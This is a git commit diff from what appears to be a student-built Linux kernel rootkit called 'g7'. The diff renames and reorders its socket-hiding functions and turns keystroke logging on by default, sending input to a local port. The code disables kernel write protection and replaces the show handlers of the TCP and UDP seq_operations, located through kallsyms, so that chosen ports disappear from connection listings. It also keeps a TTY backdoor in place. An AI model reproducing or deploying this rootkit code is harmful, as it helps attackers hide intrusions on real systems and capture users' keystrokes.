commit 8ab6f96556309dbc01e49f9be723d584fcc506ac
parent 005fd32ac661d6d886fa818a5932b65ee7becb63
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 13 Dec 2020 02:50:43 +0100
refactors code
Diffstat:
5 files changed, 27 insertions(+), 29 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -188,7 +188,7 @@ handle_tcphide(unsigned long arg)
if (!sarg) {
// TODO also remove all sockets (tcp & udp) that are currently being hidden
rootkit.hiding_sockets = 0;
- unhook_show();
+ unhide_sockets();
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
unhide_port((port_t)-sarg, tcp4);
@@ -196,7 +196,7 @@ handle_tcphide(unsigned long arg)
DEBUG_NOTICE("[g7] unhiding tcp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
- hook_show();
+ hide_sockets();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
@@ -214,7 +214,7 @@ handle_udphide(unsigned long arg)
long sarg = (long)arg;
if (!sarg) {
- unhook_show();
+ unhide_sockets();
rootkit.hiding_sockets = 0;
DEBUG_NOTICE("[g7] socket hiding off\n");
} else if (sarg < 0) {
@@ -223,7 +223,7 @@ handle_udphide(unsigned long arg)
DEBUG_NOTICE("[g7] unhiding udp socket with port %ld\n", -sarg);
} else if (sarg > 0) {
if (!rootkit.hiding_sockets) {
- hook_show();
+ hide_sockets();
DEBUG_NOTICE("[g7] socket hiding on\n");
}
hide_port((port_t)sarg, udp4);
diff --git a/src/g7.c b/src/g7.c
@@ -45,7 +45,7 @@ rootkit_t rootkit = {
.hiding_open = true,
.hiding_pids = true,
.hiding_sockets = true,
- .logging_input = false,
+ .logging_input = true,
.backdoor = BD_TTY,
};
diff --git a/src/hook.c b/src/hook.c
@@ -84,6 +84,9 @@ init_hooks(void)
if (rootkit.hiding_pids)
hide_pids();
+ if (rootkit.hiding_sockets)
+ hide_sockets();
+
if (rootkit.backdoor == BD_READ)
backdoor_read();
else if (rootkit.backdoor == BD_TTY)
@@ -91,9 +94,6 @@ init_hooks(void)
if (rootkit.logging_input)
log_input("127.0.0.1", "5000");
-
- if (rootkit.hiding_sockets)
- hook_show();
}
void
@@ -113,14 +113,14 @@ remove_hooks(void)
unhide_pids();
}
+ if (rootkit.hiding_sockets)
+ unhide_sockets();
+
if (rootkit.backdoor != BD_OFF)
unbackdoor();
if (rootkit.logging_input)
unlog_input();
-
- if (rootkit.hiding_sockets)
- unhook_show();
}
void
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -28,24 +28,24 @@ static int g7_udp4_seq_show(struct seq_file *, void *);
static int g7_udp6_seq_show(struct seq_file *, void *);
void
-hook_show(void)
+hide_sockets(void)
{
- tcp4_seq_show
+ tcp4_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show;
- tcp6_seq_show
+ tcp6_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show;
- udp4_seq_show
+ udp4_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("udp_seq_ops"))->show;
- udp6_seq_show
+ udp6_seq_show
= ((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show;
disable_protection();
((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
= (void *)g7_tcp4_seq_show;
-
+
((struct seq_operations *)kallsyms_lookup_name("tcp6_seq_ops"))->show
= (void *)g7_tcp6_seq_show;
@@ -54,11 +54,11 @@ hook_show(void)
((struct seq_operations *)kallsyms_lookup_name("udp6_seq_ops"))->show
= (void *)g7_udp6_seq_show;
- enable_protection();
+ enable_protection();
}
void
-unhook_show(void)
+unhide_sockets(void)
{
disable_protection();
((struct seq_operations *)kallsyms_lookup_name("tcp4_seq_ops"))->show
@@ -75,7 +75,7 @@ unhook_show(void)
enable_protection();
}
-void
+void
hide_port(port_t port, proto proto)
{
add_port_to_list(hidden_ports_tail, port, proto);
@@ -97,7 +97,7 @@ port_list_t_ptr
find_port_in_list(port_list_t_ptr head, port_t port, proto proto)
{
port_list_t_ptr i;
- for (i = head; i; i = i->next)
+ for (i = head; i; i = i->next)
if (i->port == port && i->proto == proto)
return i;
@@ -152,7 +152,7 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto proto)
static int
g7_tcp4_seq_show(struct seq_file *seq, void *v)
{
- //SEQ_START_TOKEN is used to indicate that a
+ //SEQ_START_TOKEN is used to indicate that a
//header will be returned first
if(v == SEQ_START_TOKEN)
return tcp4_seq_show(seq, v);
@@ -186,7 +186,7 @@ g7_tcp6_seq_show(struct seq_file *seq, void *v)
if(list_contains_port(&hidden_ports, src, tcp6)
|| list_contains_port(&hidden_ports, dst, tcp6))
return 0;
-
+
return tcp6_seq_show(seq, v);
}
@@ -226,4 +226,4 @@ g7_udp6_seq_show(struct seq_file *seq, void *v)
return 0;
return udp6_seq_show(seq, v);
-}
-\ No newline at end of file
+}
diff --git a/src/sockhide.h b/src/sockhide.h
@@ -20,8 +20,8 @@ typedef struct port_list {
extern port_list_t hidden_ports;
-void hook_show(void);
-void unhook_show(void);
+void hide_sockets(void);
+void unhide_sockets(void);
void hide_port(port_t, proto);
void unhide_port(port_t, proto);
@@ -31,4 +31,4 @@ port_list_t_ptr find_port_in_list(port_list_t_ptr, port_t, proto);
port_list_t_ptr add_port_to_list(port_list_t_ptr, port_t, proto);
port_list_t_ptr remove_port_from_list(port_list_t_ptr, port_t, proto);
-#endif //_GROUP7_SOCKHIDE_H
-\ No newline at end of file
+#endif //_GROUP7_SOCKHIDE_H
